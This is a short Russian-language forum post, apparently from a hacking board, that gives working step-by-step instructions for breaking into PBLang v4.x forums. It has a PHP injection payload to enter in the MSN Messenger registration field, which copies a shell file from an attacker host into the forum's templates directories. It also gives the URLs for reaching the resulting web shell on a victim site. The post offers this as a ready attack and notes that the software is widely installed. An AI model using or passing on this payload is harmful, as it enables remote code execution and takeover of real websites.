PBLang v4.x shell exploit
Вот если кто не знал , есть такой способ взлома . Ребята изи NST.Void молодцы!
Код:
Всё давольна проста:
1. Заходим на форум в отдел регистрации
2. Вводим имя и пароль
3. в окошко MSN Messenger добовляем строчку:
";?><? copy("http://ATTACKER/shell.txt","templates/pb/images/ranks/shell.php"); copy("http://ATTACKER/shell.txt","templates/shell.php"); ?><?#
далее жмём регистрироватся, залогинимся..
далее идём по сылке:
http://VICTIM/path-to-forum/templates/shell.php
или
http://VICTIM/path-to-forum/templates/pb/images/ranks/shell.php
Много где стоит!!!
|